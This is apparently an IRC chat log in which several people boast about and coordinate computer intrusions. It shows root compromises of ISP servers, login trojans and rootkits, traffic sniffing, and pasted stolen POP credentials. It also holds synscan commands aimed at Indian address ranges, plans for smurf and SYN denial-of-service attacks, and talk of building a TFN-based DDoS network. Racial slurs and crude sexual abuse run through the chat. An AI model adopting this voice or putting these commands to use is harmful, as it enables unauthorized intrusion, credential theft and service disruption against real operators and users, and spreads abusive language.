:Sp07! :[03:22] what port does it connect to?
:Sp07! :[03:22] example.org = irix
:D1ck! :(@kurupto0n): anyone have a remote root sploit for sendmail 8.9.3?
:D1ck! :hahaha
:D1ck! :i`m looking for it,;)
:D1ck! :[03:18] *** Warning- Over 30 sec lag to self
:D1ck! :[03:19] *** Warning- Over 60 sec lag to self
:Sp07! :haha
:Sp07! :WARNING WARNING
:Sp07! :afk me go play games
:D1ck! :Sp07
:Sp07! :?
:Sp07! :I just kicked some ASS
:D1ck! :Sp07
:D1ck! :u there?
:Sp07! :yes
:D1ck! :did u see h4r33 EOF ;)?
:D1ck! :HAHAHAHAHHA
:D1ck! :he's ultra lame
:D1ck! ::P
:Sp07! :yeah
:D1ck! :lol
:D1ck! :kill -9 9394
:D1ck! :pid of 'bnc'
:Sp07! :uh hehe
:Sp07! :why dont you sniff all the shit he does on irc
:Sp07! :and spy on him
:Sp07! :get his passwords
:D1ck! :hmmmm
:D1ck! :can i do that?
:Sp07! :yeah
:D1ck! :if yes then how?
:D1ck! :i have sniffer
:Sp07! :hes using that shell as a bounce right?
:Sp07! :sniff the port
:D1ck! :on the box
:Sp07! :that he uses
:Sp07! :heh
:D1ck! :./sniff -d 8000
:D1ck! :errr
:D1ck! :how?
:Sp07! :uhh
:Sp07! :find out the port number
:Sp07! :then sniff it
:Sp07! :with your sniffer
:D1ck! :thats a good idea
:Sp07! :=D
:Sp07! :I think that will work
:Sp07! :never tried it
:D1ck! :fuck i trojanned the box and removed his 'trojan'
:D1ck! :HAHAHA
:D1ck! :oh
:Sp07! :either sniff the port
:Sp07! :or sniff everything going out to the irc server
:D1ck! :motos# ./sniff-100mb -help
:D1ck! :Usage: ./sniff-100mb [-d x] [-s] [-f] [-l] [-t] [-i interface] [-o file]
:D1ck! : -d int set new data limit (128 default)
:D1ck! : -s filter out smtp connections
:D1ck! : -f filter out ftp connections
:D1ck! : -l filter out rlogin/rsh connections
:D1ck! : -t filter out telnet connections
:D1ck! : -o output to
:D1ck! :heh
:Sp07! :use a different sniffer heh
:D1ck! :lol
:Sp07! :use sniffit
:D1ck! :there aren't many for sun
:Sp07! :sniffit
:D1ck! :hmmmm
:D1ck! :oh yeah
:Sp07! :forgot where to get it
:D1ck! :sniffit
:D1ck! :
:D1ck! :get me a binary
:D1ck! :motos# cc
:D1ck! :gcc
:D1ck! :motos# gcc: Command not found
:D1ck! :./usr/ucb/cc: language optional software package not installed
:D1ck! :.ghay boxens
:Sp07! :haha
:D1ck! :;/
:D1ck! : grid (~grid@example.net
:D1ck! :that fucking packet m0nk
:D1ck! :hehe
:Sp07! :?
:D1ck! :hahahaha
:D1ck! :nevah mind
:Sp07! :brass monkey
:D1ck! :u master badah
:D1ck! :hehee
:Sp07! :that funky monkey
:D1ck! :lol
:D1ck! :heh
:D1ck! :that roxer muh nipples
:D1ck! :man
:D1ck! :hmmm
:D1ck! :give me access to a red hat box (local)_
:D1ck! :i`ll rewt it
:D1ck! :u know what i did yesterday?
:D1ck! :echo "some-ip" > roots.txt
:D1ck! ::/
:D1ck! :and i lost most ip's like before
:D1ck! :i was h1gh
:Sp07! :heh
:Sp07! :I dont have anymore accounts except legal ones
:Sp07! :heh
:D1ck! :heh
:D1ck! :ok
:Sp07! :well actually I still have some
:Sp07! :but I will hold on to them
:D1ck! :ok;)
:D1ck! :what IRIX box u just mentioned?
:Sp07! :example.org
:Sp07! :is irix
:Sp07! :I had like 3 accounts there
:Sp07! :and for some reason they all got canceled
:Sp07! :what are some isps that allow shell access?
:Sp07! :I wanna root some isps
:Sp07! :whys that fag taddpole keep joining linuxsex
:Sp07! :dos him
:Sp07! :hehe
:Sp07! :do /whois Sp07
:Sp07! :im cool
:Sp07! :I got +v in #example
:Sp07! :heh
:D1ck! :heh
:D1ck! :J4n3
:Sp07! :damn my v went away
:D1ck! :v?
:D1ck! :huh
:J4n3! :D1ck
:Sp07! :+
:D1ck! :sup J4n3
:D1ck! :hahahhaha
:D1ck! :lol
:J4n3! :nuffin much :p u ?
:D1ck! :nadda
:D1ck! :masturbation, etc
:D1ck! :and analing Sp07
:J4n3! :heh
:J4n3! :all about sex :p
:D1ck! :;)
:Sp07! :uhhhhh
:D1ck! :i just tookover 3 of diz's box today ;(
:D1ck! :one day i did 36
:Sp07! :suck it
:D1ck! :heh
:D1ck! :*ALL* his boxes
:J4n3! :woo
:D1ck! :Sp07
:D1ck! :hmmmmmm
:D1ck! :um
:Sp07! :?
:D1ck! :J4n3: whose domain example.com is?
:D1ck! :and who hosts it
:D1ck! :satnet called up zahid eh
:J4n3! :donno about it but know who owns it
:J4n3! :its a friend
:D1ck! : /msg Sp07 man anal me
:D1ck! :oooops
:D1ck! :who?
:D1ck! :hmmmm
:J4n3! :i gave him sat file to publ1sh
:D1ck! :n1ck?
:D1ck! :oh cool
:J4n3! :Zolo
:D1ck! ::)
:J4n3! :;)
:D1ck! :hehe k
:J4n3! :z33sh4n
:D1ck! :ah
:D1ck! :that a boy
:D1ck! ::P)
:D1ck! :zmasterz ?
:J4n3! :they called zahid ?
:D1ck! :u know that guy Sp07
:D1ck! :J4n3 yeah
:Sp07! :yeah
:D1ck! :k
:J4n3! :about what ?? what they said ?
:D1ck! :i dunno
:Sp07! :they wanted to suck my dick
:Sp07! :but I turned them down
:Sp07! :sorry
:D1ck! :J4n3 : they were blaming a guy that he gave miller access and miller defaced..
:D1ck! :HAHAHAHAA
:J4n3! :LOOOOOL
:D1ck! :Sp07
:D1ck! :wat was that IRIX box
:D1ck! :not the .edu
:D1ck! :the other one u gave me to ./own
:D1ck! :?
:Sp07! :kcnet.org
:D1ck! :k
:D1ck! :Sp07: u have an IRIX root kit u could send?
:Sp07! :no
:Sp07! :I just used bj
:Sp07! :the login trojan
:D1ck! :oh
:D1ck! :k
:D1ck! :send me bj.c
:D1ck! :i lost mine
:D1ck! :
:Sp07! :uh
:Sp07! :I dont have anything
:Sp07! :hehe
:D1ck! :heh oh
:D1ck! :u gave up hacking
:D1ck! :
:Sp07! :something like that
:Sp07! :sooner or later im gonna get arrested for it
:Sp07! :so I stopped
:D1ck! :oh
:D1ck! :ok
:Sp07! :and its not making me any money so its pointless
:D1ck! :i will NEVER GET ARRESTED
:Sp07! :I want to start up my own web hosting server
:D1ck! :cOzM y coUnTrY KiKs AsS
:D1ck! :ahahah
:D1ck! :oh
:Sp07! :We GoT HaMBuRgErS iN My CUnTrY
:Sp07! :hehehe
:D1ck! :heh
:D1ck! :IBM AIX Version 4.x for RISC System/6000
:D1ck! :(C) Copyrights by IBM and by others 1982, 1996.
:D1ck! :Access and use restricted to authorized individuals.
:D1ck! :cub login:
:D1ck! : /* Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2, */
:D1ck! :fuck
:Sp07! :heh
:D1ck! : ;p
:Sp07! :what time is it in pakiland?
:Sp07! : nm
:Sp07! : /~\/~\
:Sp07! :tittiies
:Sp07! : . .
:Sp07! :/~\/~\
:Sp07! :titties
:D1ck! :hmmmmmmm
:D1ck! :6 am
:Sp07! : , ,
:Sp07! :/~\/~\
:D1ck! :Entering proxyloop..
:D1ck! :fuck
:D1ck! :;)
:D1ck! :uid=0(root) gid=0(root)
:D1ck! :*sigh*
:Sp07! :woohoOO
:Sp07! :YipPpepEEeee
:Sp07! :damn
:Sp07! :it is hot in here
:D1ck! :hehe
:Sp07! :is it hot in here or is it just you?
:Sp07! :is that a banana in your pocket or are you just happy to see me
:D1ck! :its hot
:Sp07! :hehe
:Sp07! :im bored
:Sp07! :yes that is a 10 foot banana in my pocket
:D1ck! :i`ll eat halwa puri
:D1ck! :its tasty tasty breakfast in pakistan
:D1ck! :u get it for $2
:D1ck! :or $1
:D1ck! :J4n3 janies
:D1ck! :scan for bind 8.2
:D1ck! :8.2.1
:D1ck! :HELLO
:D1ck! :Sp07
:D1ck! :a/s/;
:D1ck! :a/s/l
:D1ck! :a/s/l
:D1ck! :i`m hot dude
:D1ck! :
:D1ck! :calcuta
:D1ck! :INDIAN
:D1ck! :wana chat?
:Sp07! :?
:D1ck! :sand nigger
:D1ck! :heh
:Sp07! :343/sdfdf/9sdf90d7fs
:D1ck! :HAHAHAHHHAHA
:D1ck! :i remember the days when i used to go to msdos and type ping ip
:D1ck! :and 'laG' it
:D1ck! :hahaha
:D1ck! :72 months back
:D1ck! :w00p
:D1ck! :HAFEEEEEEEEEZ
:D1ck! :zoooooooooooooom owned
:D1ck! :HAFEEEEEEEZ
:D1ck! :HAFEEEEEEEZ
:D1ck! :HAFEEEEEEEZ
:D1ck! :50,00 passwords
:D1ck! :50,00 passwords
:Sp07! :?
:Sp07! :50,00?
:Sp07! :hehe
:D1ck! :yeah man
:D1ck! :local isp's ns
:D1ck! :hehe
:D1ck! :I HATE TO OWN
:Sp07! :heh
:D1ck! :coz then
:D1ck! :i have to trojan
:D1ck! :hehhe
:D1ck! :i have to trojan before they wake up
:Sp07! :free internet access
:Sp07! :hehe
:Sp07! :for you and your friends
:Sp07! :try to own earthlink.net
:Sp07! :or pacbell
:Sp07! :hehe
:D1ck! :haha yep
:D1ck! :we dont have earthlink
:D1ck! :man
:D1ck! :i have 0 NT skillz
:D1ck! :teach me NT
:Sp07! :?>
:D1ck! :nt
:Sp07! :I dont have nt
:Sp07! :I dont exploit NT
:D1ck! :same here./
:Sp07! :almost dinner time
:Sp07! :I am starving man
:D1ck! :hehe
:D1ck! :same here.
:Sp07! :uhhhhhhhhhhuhuhuuhu
:Sp07! :afk
:Sp07! :tv time
:J4n3! :D1ck
:J4n3! :back from sex ;p
:D1ck! :hahhaa
:D1ck! :examplenet owned
:D1ck! :main server
:J4n3! :haahh
:J4n3! :kewl
:J4n3! :u got it again
:D1ck! :no
:D1ck! :this is new one
:J4n3! :huh reallY ?
:J4n3! :trojaned ?
:D1ck! :yeah
:D1ck! :send me root/owned
:D1ck! :send me root/owned
:J4n3! :wait
:D1ck! :or some other u have
:D1ck! :192.168.232.173 => 192.168.129.21 [110]
:D1ck! :USER wajahatz
:D1ck! :PASS fwjs
:J4n3! :hahah sniffed already ?
:D1ck! :yep
:D1ck! :;)
:D1ck! :i`m fast
:D1ck! :hehe
:J4n3! :kewl :p
:D1ck! :what is linux.tar?
:J4n3! :send me a file yaar
:J4n3! :owned login trj
:D1ck! :hehe it has one pass
:D1ck! :the one i pasted
:D1ck! :;/
:J4n3! :lol
:D1ck! :;p
:J4n3! :ye haal hogaya hai example ka :/ "this is the state example is in"
:J4n3! :it must be mail account
:D1ck! :lol
:J4n3! :they checked it from worldtel
:D1ck! :yep
:J4n3! :D1ck i have another login trj same like this but different pass
:D1ck! :send me
:D1ck! :HURRY
:D1ck! :HURRY
:D1ck! :they will wake and find out
:D1ck! :
:J4n3! :its on my shell
:D1ck! :ok
:J4n3! :download it from there
:D1ck! : /msg
:D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:J4n3! :Pvamu nick immi
:J4n3! :hiall abi aayegee and she'll get killed by server :p "hiall will come now and she'll get killed by server"

-=- Day 04 June 7

:D1ck! : i even have a legit box t3 | paying 800 per month for it | its a auth ns watch me in a week with my i
:D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:D1ck! :y0h
:D1ck! :worldtel simply
:D1ck! :sux
:J4n3! :y0 y0
:J4n3! :sure it does
:D1ck! ::/
:J4n3! ::\
:J4n3! :4 mb bandwidth :/
:D1ck! :i`m using my bro's webnet
:D1ck! ::)
:D1ck! :it rox
:J4n3! :it only works fine after 3 am to 10 am
:D1ck! : mb my ass
:D1ck! : mb my ass
:D1ck! :4 mb my ass
:D1ck! :HAHAHAHAHA
:J4n3! :hmmmmm :/
:D1ck! :lol
:D1ck! : it only works fine after 3 am to 10 am
:J4n3! :satnet laaak darjay acha hai yaar is say "satnet is 100000 times better than this"
:D1ck! :any isp does
:D1ck! :rofl
:D1ck! :satnet rox
:J4n3! :satnet only goes down from 10 pm to 1 am
:J4n3! :other time it rox
:D1ck! :true
:J4n3! :l0st example ?
:D1ck! :yep
:J4n3! ::(
:J4n3! :whois blue0 ?
:D1ck! blue0 :Bitch-X BaBy
:D1ck! :dunno
:J4n3! :hmm
:J4n3! :yaar ye bot be sub gayeb hain "dude, these bots have all disappeared"
:D1ck! :ehehe
:J4n3! :j0e manhoos ka server he down hai :/ "that wretch j0e's server is down"
:D1ck! :oh
:D1ck! :lol
:D1ck! :how come?
:J4n3! :hehe those bots rox
:J4n3! :donno server resolve nahin horhaa "dunno, the server isn't resolving"
:J4n3! :aur us say contact be nahin horaha "and I can't get in contact with him either"
:J4n3! :thakay poochon "ok, let me ask"
:J4n3! :wait lemme call
:D1ck! :oh
:D1ck! :may be he's caught?
:D1ck! : may be he's caught?
:J4n3! :hmmm
:J4n3! :nope
:J4n3! :wo bauth harami banda hia "he's a total bastard"
:J4n3! :ithnee aasaani say nahi pakra jayega "he won't be caught so easily"
:J4n3! :haha u know what ?
:D1ck! :?
:J4n3! :he once asked miller to add him in k1dd13
:D1ck! :lol
:J4n3! :coz he's very close to miller
:J4n3! :miller said ok
:J4n3! :hehe
:D1ck! :hahaha
:D1ck! :oh then?
:J4n3! :hah then donno he didn't come here
:J4n3! : h1ghn3ss [~haris@hi-tech.example.net] has joined #karachi (Karachi is a city in Pakistan - FYI)
:D1ck! :oye
:D1ck! :[fuksnpr(~blue@adsl-example.net)] you worthless fucking script
:D1ck! : kiddie pieces of shit
:D1ck! :dos him
:D1ck! :dos the fuck
:D1ck! :dos the fuck out of adsl-example.net
:J4n3! :heh
:J4n3! :wait
:D1ck! :ok
:D1ck! :J4n3
:D1ck! :tell me more
:D1ck! :oye
:D1ck! :lets do a mass defacement operation
:J4n3! :D1ck
:D1ck! :J4n3
:J4n3! :fuck light's chali gayeen theen :( "fuck, there was a power cut, the lights went out"
:D1ck! :ehhee ok
:J4n3! :D1ck world tel abi tight chal raha hai :PpPPp "world tel is running fine right now"
:D1ck! :hehe i`m on webnet
:J4n3! :Nahin yaar abee tight chal raha hai "no dude, it's running fine right now"
:J4n3! :forun telnet fast working "telnet working fast straight away"
:J4n3! :no lag :p
:J4n3! :yaar dos1ng is easy from windows (yaar = dude)
:D1ck! :of course
:J4n3! :linux main banda confuse hojatha hai "in linux a person gets confused"
:D1ck! :yep
:D1ck! :;)
:J4n3! :lemme own sum 1nd1an b0x3s and bring more bots :p
:D1ck! :oye
:D1ck! :scan indian servers for bind
:D1ck! :8.2
:D1ck! :and
:D1ck! :8.2.1
:J4n3! :am on windows right now
:J4n3! :i'll do it later and make a log of it
:D1ck! :0h
:D1ck! :okie
:D1ck! :kewl
:J4n3! :or wait lemme see if j0e's server is up
:J4n3! :i'll do it from there
:D1ck! :oki
:D1ck! :aHAhahaha
:D1ck! : oh ho
:D1ck! : aaj tum vanila nahin anilaa lag rahi ho "today you don't look vanilla, you look 'anilaa'"
:D1ck! : undar say kurwi upar ssay chamkili "bitter on the inside, shiny on the outside"
:D1ck! :HAHAHAHAH
:D1ck! :start par addd "add it at the start"
:D1ck! :
:D1ck! :lol
:J4n3! :hehe
:D1ck! :hehee
:J4n3! :ravi console Jun 7 20:30 (:0)
:J4n3! :ravi pts/4 Jun 7 20:31
:J4n3! :ravi pts/5 Jun 7 20:31
:J4n3! :ravi pts/3 Jun 7 20:31 ( )
:J4n3! :ravi pts/6 Jun 7 20:31
:J4n3! :ravi pts/7 Jun 7 20:31 (:0.0)
:J4n3! :ravi pts/8 Jun 7 20:31 (:0.0)
:J4n3! :active hmm
:D1ck! :hahahah
:D1ck! :scan
:D1ck! :scan
:D1ck! :scan
:D1ck! ::)
:D1ck! :india***
:D1ck! ::P
:J4n3! :hehe
:J4n3! :*******************************************************************************
:J4n3! : A T T E N T I O N
:J4n3! :*******************************************************************************
:J4n3! : YOU ARE REQUESTED TO RESHELVE THE BOOKS AFTER USE
:J4n3! : SO THAT WE CAN MAINTAIN A CLEAN AND TIDY WORKING ENVIRONMENT
:J4n3! : THANKING YOU FOR YOUR KIND CO-OPERATION
:J4n3! :****************************************************
:J4n3! :ok sir :)
:D1ck! :hahahaa
:D1ck! :thanks:)
:D1ck! :hehe
:D1ck! :i`m so sleeeeeeeeepy
:D1ck! :oye if i sleep i`ll be back till 3-4
:D1ck! :or 4-5-
:D1ck! ::P
:D1ck! :oye
:D1ck! :windows?
:D1ck! :get that webpage done :P
:J4n3! :yeah
:J4n3! :yeah Inshallah tonight "God willing"
:J4n3! ::)
:J4n3! :oye wordtel daur raha hai hahaha very fast :p "yo, world tel is running, hahaha, very fast"
:J4n3! :patha nahi kaisay chamatkaar hogaya :/ "don't know how the miracle occurred"
:J4n3! :Mashallah Mashallah "good lord, good lord"
:J4n3! :kahin nazar na lag jaye kameenay ko "just hope the bastard doesn't get an evil eye"
:J4n3! :D1ck
:J4n3! :heh khamoshi of #pakistan dossed :p
:D1ck! :?
:D1ck! :why?
:J4n3! :kisi aur ko karna hai ? "do you want to do anyone else?"
:D1ck! :nope
:J4n3! :coz i had a panga with its owner "because i had a quarrel with its owner"
:J4n3! :tkx
:D1ck! :dosing with out any reason
:D1ck! :hehee
:J4n3! :i dont go to channel pakistan anymore
:D1ck! :oh
:J4n3! :though i have access there still
:J4n3! :yaar ek baath samaj nahi aatha "dude, i can't understand one thing"
:D1ck! :THATS A GOOD REASON
:D1ck! :THATS A GOOD REASON
:D1ck! :THATS A GOOD REASON
:D1ck! ::P
:D1ck! :oye
:D1ck! :scan kya "did you scan?"
:D1ck! :?
:D1ck! :
:cool :D1ck! :???? :D1ck! :??????????????? :D1ck! :???????????????????????? :J4n3! :when u do smurf attack, then ppl come back soon , i mean jaldee up hojathay hain jaldee = quickly :D1ck! :??????????????????????????????? :J4n3! :lekin syn attack main tho gayeb hee hojathay hain "but they disappear in a syn attack" :D1ck! :?????????????????????????????????????? :D1ck! :smurf sucks :J4n3! :khamoshi ek gantay say down hai phir up nahin huwa "khamoshi (the word means silence, but used here as a server name, i guess) is down since one hour, and not yet come up" :J4n3! :jub wo ping time out huwa tha thub mainay attack chor diya i mean rok liya "when the ping timed out, i stopped the (ongoing) attack" :D1ck! :smurf is only good if u have a VIRGIN and tyte ip file, with duals routers in it :J4n3! :lekin phir bee up nahin huwa abee thak "but still it is not up till now" :J4n3! :yeahhh :J4n3! :syn rox :D1ck! :hehe :J4n3! :i did ./z0ne -clo in > in & .in is the TLD for indian sites :J4n3! :heh i do it with 8 boxes , satyanaas hojatha hai "i do it with 8 boxes, creates sheer destruction" :D1ck! :how do u scan syn with iplist? :D1ck! :./synscan INDIA.log :D1ck! :u can do that????? :D1ck! :lol :D1ck! :;) :D1ck! :i do it with 35 boxes :D1ck! :(i`m talking about when i had roots) :D1ck! :now i have 4 roots :D1ck! ::( :D1ck! :or soem thing :D1ck! :: :D1ck! ::) :D1ck! :coz i`m now towards coding. :D1ck! ::P :D1ck! :for a while :D1ck! :heh :J4n3! :huh :J4n3! :good :J4n3! :naa i'm donig z0ne on india :J4n3! :then will do ./synscan in.log in eth0 100 53 :D1ck! :kewl :J4n3! ::) :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck! : jeje :D1ck! :oh :D1ck! :god :D1ck! :look who is here :m4ry! :yo :m4ry! :faw :m4ry! :code 33 :D1ck! :lahore :D1ck! :? :D1ck! :m4ry :D1ck! :m4ry :D1ck! :ah :D1ck! :hehehe :m4ry! :lahore owns yew :m4ry! :WOL :D1ck! :hehehe :D1ck! :man :m4ry! :scan it for me :m4ry! :my cuz is outta hours :m4ry! :the admin to my NS finally logged in :D1ck! 
:this is the first time i`ve seen u on IRC at 1 am :D1ck! :this is the first time i`ve seen u on IRC at 1 am :m4ry! :haha :D1ck! :hahaha :m4ry! :my cuz has O'levels :m4ry! :and he's online rightn ow :m4ry! :so Sup :D1ck! :LOL :D1ck! :not much :D1ck! :bored :D1ck! :oh :D1ck! :owned example net's NS :D1ck! :but lost it that very second :D1ck! ::/ :m4ry! :oh :m4ry! :btw :m4ry! :btw :D1ck! :6 am :m4ry! :add a examplenet acct for me :D1ck! :they were in :m4ry! :i can use ithere :D1ck! : :D1ck! :i dont have example, any more :m4ry! :ithere = it here :D1ck! ::/ :m4ry! :also, contact Rdog, tell him to add a account on the Gilgit Comsats server :m4ry! :i can use that here as well :D1ck! :i juped diz :D1ck! :and #delusion almosr got purged :m4ry! :i lost 2 more linux ooxes :/ :m4ry! :LOL :m4ry! :aww :m4ry! :RR..? :D1ck! :hehe :D1ck! :Rdog? :m4ry! :get it purged man :D1ck! :he wants ISP's :m4ry! :DoS rapt0r/pr0be :D1ck! :frtom me :D1ck! ::p :D1ck! :i will :) :D1ck! :hehe :m4ry! :lol :D1ck! :yep :m4ry! :add the damn accounts :m4ry! :and let me know :D1ck! :i ookover 4 diz's boxes :m4ry! :and btw, the example admin is a chick :D1ck! :oki :m4ry! :aain? :P~ :m4ry! :again? :P~ :D1ck! ::P~ :D1ck! :gegege :D1ck! :yep :D1ck! : again? :P~ :D1ck! :yep :D1ck! :owned 4 .uk :D1ck! :'s :m4ry! :keep Diz's boxen :D1ck! :he is lame :m4ry! :i'll gety started on the SunOS version of TFN :D1ck! :his pass was 'fuck111' :D1ck! :hehe :D1ck! :ok :D1ck! :good. :m4ry! :we'll have the bifiggerst FN in the world :m4ry! :since ADM :m4ry! :lol :D1ck! :yep :m4ry! :he's lame :D1ck! :jane got 20000+ :m4ry! :his pass was 'jusjesus' last time :D1ck! :hehe :m4ry! :(that's what faisal told me) :m4ry! :and u told me :D1ck! :jane + m4ry + rave + dick :D1ck! :oh god :D1ck! :bandwith :D1ck! :hahahaha :D1ck! :nope :m4ry! : = Major FN :m4ry! :shit :m4ry! :i hate this :m4ry! :keyboard :J4n3! :save2 add J4n3 * J4n3 100 1 4 :J4n3! :save2 add d1ck * d1ck 100 1 4 :D1ck! :are u in BX? :m4ry! :J4n3 :m4ry! :sup :m4ry! 
:d00d :m4ry! :man i'm hungry :J4n3! :save2 add m4ry * m4ry 100 1 4 :J4n3! :m4ry :p :D1ck! :hahaha :m4ry! :yeah :m4ry! :BX :m4ry! :from24.* box :m4ry! :pretty fast :D1ck! :order a pizza :J4n3! :save2 save :m4ry! :T1 i think :D1ck! :hehe :J4n3! :save2 nick Canopus :D1ck! :yep :m4ry! :0-usage :m4ry! :the admin logs in wvery once in a while to run his sweet oracle :D1ck! :m4ry: when u coming back to khi? :m4ry! :prolly a week or so :m4ry! :u checked out the new kernel (2.2.15)? :D1ck! : lol :D1ck! : ratios suck ass that's why :D1ck! : try #cracks here on undernet :m4ry! :well :D1ck! :FUCK DOGGY :m4ry! :new isn't exactly true :D1ck! :SUCKING UOP LINUXSEX'S BALLS :D1ck! :$#%#@ :m4ry! :LOL :m4ry! :DoS him :m4ry! :kick/ban him :D1ck! :m4ry: nope, is it stable? :D1ck! :the kernel :D1ck! :hahaha :m4ry! :DAMN L33T KERNEL :m4ry! :get it :m4ry! :16 megs worth the download :D1ck! :kewl :J4n3! :save2 .add D1ck * D1ck 100 1 4 :D1ck! :ok i will :m4ry! :i was wondering :m4ry! :do you want to merge K1dd13 and tr1be? :m4ry! :all local guys :m4ry! :u can deal with the stupid people :m4ry! :kick them out :m4ry! :talk with faisal :m4ry! :paw :D1ck! :no merge :m4ry! :./clear :P~ :D1ck! ::P :m4ry! :ok :m4ry! :no merge :D1ck! :parents? :m4ry! :undetstood :m4ry! :understood :m4ry! :yeah :m4ry! :aunties :D1ck! :cool :m4ry! :get a husmail account :m4ry! :www.hushmail.com :m4ry! :damn l33t :D1ck! :ah :D1ck! :hahaa :D1ck! :ARW :D1ck! :lol :D1ck! :okies :m4ry! :encrypted email from user-to-user (of husmail only) :D1ck! :hetaaz: i`m geting k1dd13-online.org :D1ck! :m4ry :m4ry! :haha :D1ck! :check this :m4ry! :l33t :m4ry! :yeah..? :D1ck! :www9.example.com/k1dd13 :D1ck! :and :D1ck! :www9.example.com/k1dd13/Article3.html :D1ck! :and :D1ck! :0-day section coming up :D1ck! :password protected :D1ck! :just for u me jane rave and bob :D1ck! :in smaller versionm just for #k1dd13 :D1ck! :hehe :D1ck! ::) :m4ry! :l33t :D1ck! ::) :m4ry! :MAN :m4ry! :get PGP :m4ry! :mail me ur PGP key :m4ry! 
:ripgut@example.net :D1ck! :ok :m4ry! :pgp owns you :D1ck! :CERT.ORG? :m4ry! ::) :D1ck! :hehhe :m4ry! :what about cert? :D1ck! :ok i`ll get it? :D1ck! :ok i`ll get it :m4ry! ::) :m4ry! :yeah :m4ry! :do that :D1ck! :btw :D1ck! :www.example.com owned by rootworm :D1ck! :JP SUX :D1ck! :$@ :m4ry! :NO WAY :D1ck! :JP = qu33r :D1ck! :heh :m4ry! :COOL :D1ck! :yep :m4ry! :JP is gay :m4ry! :known fact :m4ry! :he fucked his dad :D1ck! :yep :D1ck! :fucked his dad? :D1ck! :how/why/what/when :D1ck! :? :m4ry! :shit :m4ry! :i'm out :m4ry! :aunty needs fone :m4ry! :only 1 fone :/ :D1ck! : wow :D1ck! :HAHAHAHAHAHA :D1ck! :Time 10:55 m4ry on chat, mom at back :D1ck! :HAHAAHAHAHAHHAHAHAH :J4n3! :LOOOOOOOOL :J4n3! :what a h4x0r :D1ck! ::p :D1ck! :keke :D1ck! :d4v3 :D1ck! :done with password.html :D1ck! :? :D1ck! :i`m getting LEET 0-day section :D1ck! ::) :J4n3! :kewl wait 30 mins plz :J4n3! :kuch panga horaha hai set kartha hon "some nonsense is going on, i am trying to set it" :D1ck! :oki :J4n3! :lekin masla doosra h ia "but the reason is something else" :J4n3! :mujay yaad hee nahi raha "I havent been able to remember" :J4n3! :abee tho meray system par sahi chal jayega lekin "For now, it will run from my system" :J4n3! :i think example.com doesn't give u authority to run cgi :D1ck! :oh :J4n3! :we have to put a java encryption :D1ck! :oh :D1ck! :oki :D1ck! ::( :J4n3! :don worry i'll put a tight java wait :D1ck! :oki :J4n3! :i'm on java archieve page, lemme select one :D1ck! :oki :D1ck! :J4n3 :D1ck! :how manys :D1ck! :boxes intotal u have? :J4n3! :40 sparc :J4n3! :and donno about linux :D1ck! :wow :D1ck! :cool :J4n3! :i rmoved x86's from my list :J4n3! :coz dont have rootkit :D1ck! :shit :J4n3! :but till tomorrow i'll have 70 sparc's :D1ck! :u should have given them to meh :D1ck! ::P :D1ck! :coooool :J4n3! :hmmm :( :D1ck! :./synscan 61 61.log eth0 100 111 & :J4n3! :don worry i'll give them to u now on :D1ck! :w00p :J4n3! :hehe :D1ck! :hehehe oki :J4n3! :oye :J4n3! :u know what :D1ck! 
:yeah? :D1ck! :what? :D1ck! :???? :J4n3! :i did that synscan from j0e's box :D1ck! :yep and? :J4n3! :and he got emails from all edu's and too many severs :J4n3! :shit he's wondering who did it it seems they are using their buddies' boxes to do syn scans :D1ck! :HAHAHAHAHA :J4n3! :lol :D1ck! :kik' :D1ck! :lol :J4n3! :i removed all directorys from there :J4n3! :hehehe :D1ck! :worldtel would be flooded with mailks :D1ck! :user 'shahvez' :D1ck! :user' d4v3' :D1ck! :hahahahaha :D1ck! :okki :D1ck! :give me access to his server :D1ck! :i ferg0t the pass :J4n3! ::/ :D1ck! : :D1ck! ::( :J4n3! :he changed the root pass :J4n3! :and closed all logins :D1ck! :not the root :D1ck! :local :D1ck! :desire? :D1ck! :closed? :J4n3! :yeah desire is also not working :D1ck! :wtf? :D1ck! :thats gay :J4n3! :he said he'll open it tomorrow :J4n3! :not the others but mine :D1ck! :why is he acting like he pays for the server? :J4n3! :no yaar he's jigar ,he's just worried :D1ck! :hmmmmm :J4n3! :actually he called me, tonight :D1ck! :kk :J4n3! :and dont have electricity , he said as soon as i get it on i'll open ur account :J4n3! :no actually he bought that server legally :J4n3! ::) :D1ck! : no actually he bought that server legally :D1ck! :WHAT? :D1ck! :u told me :D1ck! :that :D1ck! :he carded it@ :D1ck! :?????? :J4n3! :yup he did :J4n3! :but now he sent payment when he got email that the CC denied to pay :D1ck! :oh :D1ck! :LOL :D1ck! :ok :J4n3! :hehe he's in business mood :J4n3! :to run shell and bnc's :D1ck! :oh :D1ck! :he's a nice guy? :J4n3! :yeah he is :J4n3! :he is jigar yaar :D1ck! :cool :J4n3! :D1ck u on windows ? :D1ck! :nope :D1ck! :lInUX:( :D1ck! :i`m thinking of coding some thing :D1ck! :gonna write code for gethostname() :D1ck! :so i can use scan :J4n3! :: Multiple User Name and Password :J4n3! :Set up multiple username and passwords for members: :J4n3! :Add the code to your "enter" page, if they get it wrong, they stay, if they get it right, they can go it. 
You can set up multiple username and password in the script, like a member list. :D1ck! :and mass ath0 :J4n3! :hmmm kewl :) :D1ck! :kewl :D1ck! : :D1ck! ::))))) :J4n3! ::)) :J4n3! :there r some others lemme check them :D1ck! :m4ry :m4ry! :D1ck :m4ry! :PAW :m4ry! :FAW :m4ry! :the works :D1ck! :hehe ok :D1ck! :;) :m4ry! :everything AW :D1ck! :Hi FREIND :D1ck! :HI AUNTI :m4ry! :i need symetrix's number :m4ry! :LOL :m4ry! :SHUTUP :D1ck! :hahahahaha :m4ry! :go ask someone in #LinuxSEx for their phphone number :m4ry! :i need to call someone int he US :m4ry! :check if dialpad works :m4ry! ::/ :m4ry! :i called CERT :D1ck! :lemme ask sym? :D1ck! :hahahahaha :D1ck! :what did they say? :m4ry! :some faggot picked up and he sounded q ueer so i closed it :D1ck! :HAHAHAHAHAHA :m4ry! :seriously.. no joke :m4ry! :i think he was JP or someone :m4ry! :go ask sym :D1ck! :lame diz is online :m4ry! :or MadCamel :D1ck! :hahaha :m4ry! :or anyone :m4ry! :lol :D1ck! :hehehe :m4ry! :Dos him :D1ck! :no one's on :m4ry! :shiat :D1ck! :and i aint speaking in #linuxsex :D1ck! :OR :D1ck! :sysop :D1ck! :will eat 